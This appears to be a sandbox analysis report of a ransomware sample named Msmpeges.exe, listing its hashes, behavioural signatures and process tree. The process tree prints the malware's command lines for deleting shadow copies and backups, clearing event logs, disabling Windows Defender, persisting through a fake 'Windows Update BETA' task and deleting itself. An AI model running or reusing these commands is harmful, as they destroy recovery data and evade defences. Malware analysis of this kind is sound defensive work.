Analysis
-
max time kernel
464s -
max time network
432s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
28/07/2023, 02:05
Static task
static1
Behavioral task
behavioral1
Sample
Msmpeges.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Msmpeges.exe
Resource
win10v2004-20230703-en
General
-
Target
Msmpeges.exe
-
Size
161KB
-
MD5
1dde7e42e33b9ed602f9c839cca7150b
-
SHA1
538a0f38f2745dff05c7f2e05fc1fe3165b7767e
-
SHA256
edcccd772c68c75f56becea7f54fb7ee677863b6beaca956c52ee20ec23b472d
-
SHA512
c4d5a9288237a7f06295ea7bbb86b8917b9caba23673421dad6277506771ce87e233bb6894c30802a1cda927c2a3360be49ea2c96c245e9dc5944461e256f2b0
-
SSDEEP
3072:X2+fD5RiXm5v/ACvkIF/o7t4PX5AvJ+juO4LcVm8:VfD5RiXmh5sIm7t4PyaELcE8
Malware Config
Signatures
-
Renames multiple (7601) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation Msmpeges.exe -
Executes dropped EXE 1 IoCs
pid Process 6324 Diag.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification F:\$RECYCLE.BIN\S-1-5-21-618519468-4027732583-1827558364-1000\desktop.ini Msmpeges.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: Msmpeges.exe File opened (read-only) \??\D: Msmpeges.exe File opened (read-only) \??\G: Msmpeges.exe File opened (read-only) \??\J: Msmpeges.exe File opened (read-only) \??\M: Msmpeges.exe File opened (read-only) \??\P: Msmpeges.exe File opened (read-only) \??\S: Msmpeges.exe File opened (read-only) \??\O: Msmpeges.exe File opened (read-only) \??\Q: Msmpeges.exe File opened (read-only) \??\T: Msmpeges.exe File opened (read-only) \??\B: Msmpeges.exe File opened (read-only) \??\E: Msmpeges.exe File opened (read-only) \??\I: Msmpeges.exe File opened (read-only) \??\K: Msmpeges.exe File opened (read-only) \??\L: Msmpeges.exe File opened (read-only) \??\U: Msmpeges.exe File opened (read-only) \??\H: Msmpeges.exe File opened (read-only) \??\N: Msmpeges.exe File opened (read-only) \??\W: Msmpeges.exe File opened (read-only) \??\Y: Msmpeges.exe File opened (read-only) \??\A: Msmpeges.exe File opened (read-only) \??\R: Msmpeges.exe File opened (read-only) \??\X: Msmpeges.exe File opened (read-only) \??\Z: Msmpeges.exe File opened (read-only) \??\F: Msmpeges.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-pl.xrm-ms.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-pl.xrm-ms Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-140.png.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Resources\1033\PowerPivotExcelClientAddIn.rll Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\GRAY.pf.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js.Black Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\Black_Recover.txt Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_CN.properties.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif Msmpeges.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\Black_Recover.txt Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\Black_Recover.txt Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\msado60.tlb Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\FUNCRES.XLAM.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-ul-phn.xrm-ms.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js Msmpeges.exe File opened for modification C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml Msmpeges.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\SubsystemController.man.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentDemoR_BypassTrial180-ul-oob.xrm-ms Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\Common Files\System\ado\msado60.tlb Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msgr8fr.dub Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\BUSINESS.ONE Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerview.x-none.msi.16.x-none.tree.dat Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\ui-strings.js.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\ui-strings.js.Black Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-180.png Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub.Black Msmpeges.exe File created C:\Program Files\Common Files\microsoft shared\ink\sl-SI\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\FormatApprove.htm.Black Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfigOnLogon.xml Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_signed_out.svg Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Msmpeges.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\he-il\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-oob.xrm-ms Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ppd.xrm-ms Msmpeges.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.dat Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar.Black Msmpeges.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\organize.svg Msmpeges.exe File opened for modification C:\Program Files\Common Files\System\ado\msado20.tlb.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\ui-strings.js.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\el_get.svg Msmpeges.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3224 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5492 PING.EXE 5780 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1372 powershell.exe 4768 powershell.exe 4488 powershell.exe 4488 powershell.exe 1372 powershell.exe 1372 powershell.exe 4488 powershell.exe 4768 powershell.exe 4768 powershell.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe 4060 Msmpeges.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4060 Msmpeges.exe Token: SeRestorePrivilege 4060 Msmpeges.exe Token: SeBackupPrivilege 4060 Msmpeges.exe Token: SeTakeOwnershipPrivilege 4060 Msmpeges.exe Token: SeAuditPrivilege 4060 Msmpeges.exe Token: SeSecurityPrivilege 4060 Msmpeges.exe Token: SeIncBasePriorityPrivilege 4060 Msmpeges.exe Token: SeBackupPrivilege 3744 vssvc.exe Token: SeRestorePrivilege 3744 vssvc.exe Token: SeAuditPrivilege 3744 vssvc.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 3344 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1768 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4060 wrote to memory of 1604 4060 Msmpeges.exe 87 PID 4060 wrote to memory of 1604 4060 Msmpeges.exe 87 PID 4060 wrote to memory of 1604 4060 Msmpeges.exe 87 PID 4060 wrote to memory of 2260 4060 Msmpeges.exe 89 PID 4060 wrote to memory of 2260 4060 Msmpeges.exe 89 PID 4060 wrote to memory of 2260 4060 Msmpeges.exe 89 PID 4060 wrote to memory of 1352 4060 Msmpeges.exe 91 PID 4060 wrote to memory of 1352 4060 Msmpeges.exe 91 PID 4060 wrote to memory of 1352 4060 Msmpeges.exe 91 PID 1604 wrote to memory of 3224 1604 cmd.exe 93 PID 1604 wrote to memory of 3224 1604 cmd.exe 93 PID 1604 wrote to memory of 3224 1604 cmd.exe 93 PID 4060 wrote to memory of 2140 4060 Msmpeges.exe 94 PID 4060 wrote to memory of 2140 4060 Msmpeges.exe 94 PID 4060 wrote to memory of 2140 4060 Msmpeges.exe 94 PID 4060 wrote to memory of 940 4060 Msmpeges.exe 96 PID 4060 wrote to memory of 940 4060 Msmpeges.exe 96 PID 4060 wrote to memory of 940 4060 Msmpeges.exe 96 PID 4060 wrote to memory of 4164 4060 Msmpeges.exe 99 PID 4060 wrote to memory of 4164 4060 Msmpeges.exe 99 PID 4060 wrote to memory of 4164 4060 Msmpeges.exe 99 PID 4060 wrote to memory of 1556 4060 Msmpeges.exe 98 PID 4060 wrote to memory of 1556 4060 Msmpeges.exe 98 PID 4060 wrote to memory of 1556 4060 Msmpeges.exe 98 PID 4060 wrote to memory of 4680 4060 Msmpeges.exe 103 PID 4060 wrote to memory of 4680 4060 Msmpeges.exe 103 PID 4060 wrote to memory of 4680 4060 Msmpeges.exe 103 PID 4060 wrote to memory of 3304 4060 Msmpeges.exe 102 PID 4060 wrote to memory of 3304 4060 Msmpeges.exe 102 PID 4060 wrote to memory of 3304 4060 Msmpeges.exe 102 PID 2140 wrote to memory of 4488 2140 cmd.exe 106 PID 2140 wrote to memory of 4488 2140 cmd.exe 106 PID 2140 wrote to memory of 4488 2140 cmd.exe 106 PID 1556 wrote to memory of 4768 1556 cmd.exe 107 PID 1556 wrote to memory of 4768 1556 cmd.exe 107 PID 1556 wrote to memory of 4768 1556 cmd.exe 107 PID 3304 wrote to memory of 4656 3304 cmd.exe 109 PID 3304 wrote to memory of 4656 3304 cmd.exe 109 PID 3304 wrote to memory of 4656 3304 cmd.exe 109 PID 4680 wrote to memory of 1372 4680 cmd.exe 110 PID 4680 wrote to memory of 1372 4680 cmd.exe 110 PID 4680 wrote to memory of 1372 4680 cmd.exe 110 PID 4060 wrote to memory of 6836 4060 Msmpeges.exe 127 PID 4060 wrote to memory of 6836 4060 Msmpeges.exe 127 PID 4060 wrote to memory of 6836 4060 Msmpeges.exe 127 PID 4060 wrote to memory of 6852 4060 Msmpeges.exe 129 PID 4060 wrote to memory of 6852 4060 Msmpeges.exe 129 PID 4060 wrote to memory of 6852 4060 Msmpeges.exe 129 PID 4060 wrote to memory of 6432 4060 Msmpeges.exe 130 PID 4060 wrote to memory of 6432 4060 Msmpeges.exe 130 PID 4060 wrote to memory of 6432 4060 Msmpeges.exe 130 PID 4060 wrote to memory of 6712 4060 Msmpeges.exe 133 PID 4060 wrote to memory of 6712 4060 Msmpeges.exe 133 PID 4060 wrote to memory of 6712 4060 Msmpeges.exe 133 PID 4060 wrote to memory of 3616 4060 Msmpeges.exe 135 PID 4060 wrote to memory of 3616 4060 Msmpeges.exe 135 PID 4060 wrote to memory of 3616 4060 Msmpeges.exe 135 PID 4060 wrote to memory of 6408 4060 Msmpeges.exe 136 PID 4060 wrote to memory of 6408 4060 Msmpeges.exe 136 PID 4060 wrote to memory of 6408 4060 Msmpeges.exe 136 PID 4060 wrote to memory of 6956 4060 Msmpeges.exe 138 PID 4060 wrote to memory of 6956 4060 Msmpeges.exe 138 PID 4060 wrote to memory of 6956 4060 Msmpeges.exe 138 PID 4060 wrote to memory of 6536 4060 Msmpeges.exe 141 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F3⤵
- Creates scheduled task(s)
PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN2⤵PID:2260
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler2⤵PID:1352
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")2⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"2⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE2⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend3⤵PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN2⤵PID:6836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler2⤵PID:6852
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force2⤵PID:6432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")2⤵PID:6712
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE2⤵PID:3616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"2⤵PID:6408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵PID:6956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:6536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend3⤵PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"2⤵PID:5384
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5492
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Update BETA" /F2⤵PID:5816
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Update BETA" /F3⤵PID:3640
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Diag.exe"2⤵PID:5956
-
C:\ProgramData\Diag.exeC:\ProgramData\Diag.exe3⤵
- Executes dropped EXE
PID:6324 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 127.0.0.1 -n 5 > nul & del "C:\ProgramData\Diag.exe"4⤵PID:6480
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 55⤵
- Runs ping.exe
PID:5780
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
